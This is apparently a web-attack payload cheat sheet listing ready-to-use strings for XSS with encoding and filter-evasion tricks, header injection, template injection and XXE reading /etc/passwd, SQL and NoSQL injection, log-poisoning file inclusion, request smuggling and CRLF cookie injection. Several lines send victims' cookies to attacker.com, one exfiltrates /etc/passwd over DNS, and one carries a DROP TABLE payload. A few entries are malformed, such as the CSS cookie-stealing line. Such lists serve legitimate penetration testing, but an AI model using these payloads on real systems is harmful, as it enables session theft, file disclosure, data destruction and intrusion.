# Advanced Payloads

## 1. Obfuscation Techniques
- `<script>eval(String.fromCharCode(97, 108, 101, 114, 116))</script>`
- `<script>eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))</script>`
- `<script>eval(atob('YWxlcnQoIkhBQ0tFRCIp'))</script>`
- `<script>%u0061%u006C%u0065%u0072%u0074('Bypass');</script>`
- `<svg onload='window["al"+"ert"]("XSS")'></svg>`
- `+ADw-script+AD4-alert(1)+ADw-/script+AD4-`
- `"><img src=x onerror=confirm``>`

## 2. Header-based Attacks
- `Referer: <script>fetch('http://attacker.com/steal?cookie=' + document.cookie)</script>`
- `X-Forwarded-For: <script>alert('XSS')</script>`
- `Referer: <script>window.location.href="http://attacker.com/" + document.cookie</script>`
- `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) <script>alert(1)</script>`

## 3. Time-based Payloads
- `<script>setTimeout(function(){alert('XSS');}, 5000);</script>`
- `<img src="x" onerror="setTimeout(function(){alert(1)}, 5000)">`
- `'; IF(1=1, SLEEP(5), 0); --`

## 4. Content Injection
- `<svg/onload=alert&#40;'XSS'&#41;>`
- `<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUA...">`
- `<div style="background:url('http://attacker.com/steal?' + document.cookie)">`
- `<iframe src="http://target.com/login" style="opacity:0;position:absolute;width:100%;height:100%;top:0;left:0;"></iframe>`

## 5. Cross-Site Scripting (XSS)
- `GET /search?term=<script>alert(1)</script>&term=<b>safe</b>`
- `<svg xmlns="http://www.w3.org/2000/svg"><script>alert('XSS via SVG')</script></svg>`
- `<script>document.write("<img src='x' onerror='alert(1)'>")</script>`

## 6. Server-Side Attacks
- `{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('cat /etc/passwd').read() }}`
- `<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><root><test>&xxe;</test></root>`
- `nslookup $(cat /etc/passwd | base64) attacker.com`
- `/index.php?page=../../../../var/log/apache2/access.log&cmd=ls`

## 7. SQL Injection
- `SELECT /*!32302 1*/ FROM users WHERE username='admin' /* and password LIKE '%a%' */ -- -`
- `{"$ne": null, "$where": "this.password.match(/.*/)"}`

## 8. Logic Flaws
- `GET / HTTP/1.1 Host: target.com Content-Length: 5 HTTP/1.1 200 OK Content-Length: 0 Connection: close <script>alert('XSS')</script>`
- `Content-Type: application/xml; <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><data>&xxe;</data>`

## 9. Bypasses and Evasion
- `<img src=x onerror="alert('XSS')" </img> >`
- `%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E`
- `User-Agent: ' OR 1=1; DROP TABLE users; --`
- `1'/**/OR/**/1=1--`

## 10. Miscellaneous Techniques
- `GET /index.php?id=1&id=2&id=<script>alert(1)</script>`
- `curl -A "<?php system('ls'); ?>" http://victim.com`
- `O:8:"stdClass":1:{s:4:"file";s:13:"/etc/passwd";}`
- `Host: target.com%0d%0aSet-Cookie: sessionId=attacker`
